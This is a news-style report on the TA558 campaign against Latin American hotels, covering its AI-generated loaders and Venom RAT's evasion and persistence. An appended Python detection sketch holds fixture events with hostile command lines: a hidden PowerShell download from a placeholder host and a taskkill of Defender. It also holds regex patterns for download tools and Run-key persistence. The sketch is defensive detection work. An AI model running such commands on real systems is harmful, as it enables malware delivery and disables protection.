A cybercriminal group known as TA558 is deploying sophisticated malware attacks against hotels in Brazil and other Spanish-speaking regions. According to a new report from cybersecurity firm Kaspersky, the group is now using artificial intelligence to generate malicious code, marking a significant evolution in its tactics.
The attacks, observed during the summer of 2025, aim to install a remote access trojan called Venom RAT. The primary goal is to steal sensitive credit card information from hotel reservation systems and data feeds from online travel agencies.
Key Takeaways
- The cybercriminal group TA558, also called RevengeHotels, is targeting the hospitality industry in Latin America.
- Attackers are using phishing emails in Portuguese and Spanish with hotel reservation themes to deliver malware.
- Kaspersky researchers found evidence that Large Language Models (LLMs) were used to generate parts of the malicious code.
- The main payload is Venom RAT, a tool designed to steal data, evade security software, and maintain persistence on infected systems.
- The ultimate objective is to capture credit card data from hotel guests and online travel agencies like Booking.com.
New Attack Method Involves AI-Generated Code
The latest campaign from TA558 begins with phishing emails tailored to hotel staff. These messages, written in Portuguese and Spanish, use lures such as fake hotel reservations or job applications to convince employees to click on malicious links.
Once a link is clicked, a JavaScript payload is downloaded. Researchers at Kaspersky noted that this script was unusual. Its structure and heavy commenting strongly suggest it was generated by an AI model.
What are Large Language Models (LLMs)?
Large Language Models are advanced artificial intelligence systems trained on vast amounts of text and code. They can generate human-like text, translate languages, and write software code. While they have many positive uses, cybercriminals are beginning to adopt them to automate and improve their malicious scripts.
This initial script acts as a loader, triggering a series of steps to infect the system. It executes a PowerShell script that connects to an external server to download another component, a downloader file named "cargajecerrr.txt". This downloader then retrieves the final payloads: a loader and the Venom RAT malware.
A History of Targeting the Hospitality Sector
TA558, which Kaspersky tracks as RevengeHotels, is not a new threat. The group has been active since at least 2015, consistently focusing its efforts on the hospitality and travel industries across Latin America.
In its earlier campaigns, the group used emails with malicious Microsoft Office documents. Some of these attachments exploited a known vulnerability (CVE-2017-0199) to install a variety of remote access trojans, including:
- Revenge RAT
- NjRAT
- NanoCoreRAT
- 888 RAT
Over the years, research from firms like Proofpoint and Positive Technologies has shown the group's continuous adaptation. They have expanded their toolkit to include other well-known malware such as Agent Tesla, AsyncRAT, FormBook, and LokiBot, demonstrating a persistent effort to refine their attack methods.
Primary Target: Financial Data
The central motivation for these attacks is financial gain. TA558 specifically targets systems that store or process guest credit card details. This includes information entered directly into a hotel's system and payment data transmitted from major online travel agencies (OTAs) like Booking.com.
The Capabilities of Venom RAT
The malware at the center of this new campaign, Venom RAT, is a powerful commercial tool based on the open-source Quasar RAT. It is sold on cybercrime forums with different pricing tiers. A lifetime license costs approximately $650, while a one-month subscription can be purchased for $350.
Venom RAT provides attackers with extensive control over an infected computer. Its core functions include data exfiltration, acting as a reverse proxy for network traffic, and implementing robust anti-kill protection to ensure it continues running.
Advanced Evasion and Persistence Techniques
The malware employs several sophisticated methods to avoid detection and removal. First, it modifies the security permissions of its own process to prevent users or security software from terminating it. It also runs a continuous check every 50 milliseconds for any running processes associated with security analysis or system monitoring tools. If any are detected, it terminates them immediately.
To ensure it remains on the system after a reboot, Venom RAT creates entries in the Windows Registry. If the malware is executed with administrative rights, it elevates its own status to that of a critical system process, making it extremely difficult to stop. It also prevents the computer from entering sleep mode to maintain a constant connection.
"RevengeHotels has significantly enhanced its capabilities, developing new tactics to target the hospitality and tourism sectors," Kaspersky stated in its report. "With the assistance of LLM agents, the group has been able to generate and modify their phishing lures, expanding their attacks to new regions."
Furthermore, Venom RAT has features designed to disable Microsoft Defender Antivirus by terminating its process and altering the task scheduler. It can also spread to other devices through removable USB drives, increasing its potential to move across a network.
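As an added illustration (not code from the article or from Kaspersky's report), the following Python sketch shows how a defender could correlate the infection chain described earlier (a script host launching PowerShell, PowerShell fetching the "cargajecerrr.txt" downloader) with the Run-key persistence and Defender tampering described in this section, over constructed Sysmon-style process and registry events. The host names, file names other than cargajecerrr.txt, the example.invalid URL and the rule names are assumptions.

```python
import re

# Constructed, Sysmon-style events (id 1 = process create, id 13 = registry
# value set). Illustrative records only, not real telemetry from the campaign.
EVENTS = [
    {"id": 1, "host": "front-desk-02", "image": "wscript.exe", "parent": "explorer.exe",
     "cmd": "wscript.exe Reserva_Hotel_2025.js"},
    {"id": 1, "host": "front-desk-02", "image": "powershell.exe", "parent": "wscript.exe",
     "cmd": "powershell -w hidden -c \"iwr http://example.invalid/cargajecerrr.txt -OutFile $env:TEMP\\c.txt\""},
    {"id": 13, "host": "front-desk-02", "image": "client.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svc"},
    {"id": 1, "host": "front-desk-02", "image": "taskkill.exe", "parent": "client.exe",
     "cmd": "taskkill /F /IM MsMpEng.exe"},
    {"id": 1, "host": "back-office-01", "image": "powershell.exe", "parent": "explorer.exe",
     "cmd": "powershell Get-ChildItem C:\\Reports"},   # benign admin use, must not alert
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|"
                      r"start-bitstransfer|curl|wget)\b.*https?://\S+\.txt", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
DEFENDER = re.compile(r"MsMpEng\.exe|Windows Defender", re.I)

def rules_for(ev):
    """Return the names of the detection rules a single event matches."""
    hits = []
    if ev["id"] == 1:
        img, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
        # JavaScript loader (script host) spawning PowerShell: first hop of the chain
        if img == "powershell.exe" and parent in SCRIPT_HOSTS:
            hits.append("script_host_spawned_powershell")
        # PowerShell pulling a .txt from the web: the "cargajecerrr.txt" downloader stage
        if img == "powershell.exe" and DOWNLOAD.search(cmd):
            hits.append("powershell_downloads_txt_payload")
        # Defender process killed or its scheduled tasks altered via schtasks
        if img in {"taskkill.exe", "schtasks.exe"} and DEFENDER.search(cmd):
            hits.append("defender_tampering")
    elif ev["id"] == 13 and RUN_KEY.search(ev["target"]):
        # Run-key persistence written by an unknown binary, as Venom RAT does
        hits.append("run_key_persistence")
    return hits

def triage(events):
    """Group rule hits per host; a host with two or more distinct rules is escalated."""
    by_host = {}
    for ev in events:
        for rule in rules_for(ev):
            by_host.setdefault(ev["host"], set()).add(rule)
    return {h: sorted(r) for h, r in by_host.items() if len(r) >= 2}

if __name__ == "__main__":
    print(triage(EVENTS))
```

Thresholding on distinct rules per host rather than on any single match keeps the ordinary PowerShell use on back-office-01 from alerting while the front-desk chain is escalated.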